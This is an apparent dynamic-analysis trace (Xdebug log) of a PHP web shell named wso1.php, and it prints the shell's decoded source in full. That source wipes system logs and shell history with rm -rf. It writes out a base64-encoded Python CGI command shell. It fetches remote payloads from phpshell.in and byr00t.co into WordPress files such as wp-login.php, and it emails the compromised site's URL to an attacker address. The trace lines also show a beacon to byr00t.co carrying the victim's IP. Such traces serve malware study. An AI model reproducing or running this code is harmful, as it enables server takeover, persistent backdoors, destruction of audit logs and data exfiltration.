src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf /var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya aç\r\nı\r\nlamadı\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . "/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . "/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . "/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n' /var/www/html/uploads/wso1.php(4) : eval()'d code 1 0
4 13 0 0.007864 1143752 base64_decode 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 16 1 'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4 13 1 0.007884 1143840
4 13 R 'http://byr00t.co/l-'
4 14 0 0.007900 1143808 GetIP 1 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 16 0
5 15 0 0.007915 1143808 getenv 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 3 1 'HTTP_CLIENT_IP'
5 15 1 0.007932 1143840
5 15 R FALSE
5 16 0 0.007946 1143808 getenv 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 5 1 'HTTP_X_FORWARDED_FOR'
5 16 1 0.007961 1143840
5 16 R FALSE
5 17 0 0.007975 1143808 getenv 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 12 1 'REMOTE_ADDR'
5 17 1 0.007990 1143880
5 17 R '127.0.0.1'
4 A /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 12 $ip = '127.0.0.1'
4 14 1 0.008017 1143848
4 14 R '127.0.0.1'
4 18 0 0.008032 1143872 base64_encode 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 16 1 'http://localhost/uploads/wso1.php'
4 18 1 0.008047 1143984
4 18 R 'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhw'
3 A /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 16 $x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhw'
4 19 0 0.008080 1143864 function_exists 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 17 1 'curl_init'
4 19 1 0.008095 1143904
4 19 R TRUE
4 20 0 0.008109 1143864 curl_init 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 19 0
4 20 1 0.008128 1144776
4 20 R resource(3) of type (curl)
3 A /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 19 $ch = resource(3) of type (curl)
4 21 0 0.008157 1144776 curl_setopt 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 19 3 resource(3) of type (curl) 10002 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhw'
4 21 1 0.008177 1144872
4 21 R TRUE
4 22 0 0.008190 1144776 curl_setopt 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 19 3 resource(3) of type (curl) 19913 TRUE
4 22 1 0.008207 1144872
4 22 R TRUE
4 23 0 0.008219 1144776 curl_exec 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 19 1 resource(3) of type (curl)
4 23 1 0.052340 1144808
4 23 R ''
3 A /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 19 $gitt = ''
4 24 0 0.052401 1144776 curl_close 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 19 1 resource(3) of type (curl)
4 24 1 0.052465 1143920
4 24 R NULL
4 25 0 0.052509 1143888 file_get_contents 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 21 1 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhw'
4 25 1 0.655516 1147584
4 25 R ''
3 A /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 21 $gitt = ''
3 A /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 26 $auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3 A /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 27 $color = '#00ff66'
3 A /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 28 $default_action = 'FilesMan'
4 26 0 0.655809 1147544 define 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 29 2 'SELF_PATH' '/var/www/html/uploads/wso1.php(4) : eval()\'d code(1) : eval()\'d code'
4 26 1 0.655828 1147648
4 26 R TRUE
4 27 0 0.655843 1147576 strpos 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 30 2 'python-requests/2.25.1' 'Google'
4 27 1 0.655859 1147648
4 27 R FALSE
4 28 0 0.655883 1147576 session_start 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 32 0
4 28 1 0.655952 1148328
4 28 R TRUE
4 29 0 0.655968 1148328 error_reporting 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 33 1 0
4 29 1 0.655983 1148368
4 29 R 0
4 30 0 0.655996 1148328 ini_set 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 34 2 'error_log' NULL
4 30 1 0.656013 1148400
4 30 R ''
4 31 0 0.656026 1148328 ini_set 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 35 2 'display_errors' 0
4 31 1 0.656041 1148400
4 31 R ''
4 32 0 0.656054 1148328 ini_set 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 36 2 'log_errors' 0
4 32 1 0.656068 1148400
4 32 R '1'
4 33 0 0.656081 1148328 ini_set 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 37 2 'max_execution_time' 0
4 33 1 0.656097 1148432
4 33 R '30'
4 34 0 0.656111 1148328 set_time_limit 0 /var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code 38 1 0
4 34 1 0.656125 1148392
4 34 R FALSE
3 12 1 0.656148 1149824
2 7 1 0.656165 1062800
1 3 1 0.656173 1061224
1 35 0 0.656181 1061256 Error->__toString 0 Unknown 0 0
2 36 0 0.656193 1061336 Error->getTraceAsString 0 Unknown 0 0
2 36 1 0.656205 1061592
2 36 R '#0 /var/www/html/uploads/wso1.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php(4): eval()\n#2 {main}'
1 35 1 0.656226 1065728
1 35 R 'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/wso1.php(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/wso1.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php(4): eval()\n#2 {main}'
0.656279 986224
TRACE END [2023-02-12 22:48:00.093230]
data/traces/9d98853a714da34855a92cb5ba345601_trace-1676249972.0487.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:59:57.946581]
1 0 1 0.000179 393512
1 3 0 0.000410 426920 {main} 1 /var/www/html/uploads/wso.php 0 0
1 A /var/www/html/uploads/wso.php 2 $stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
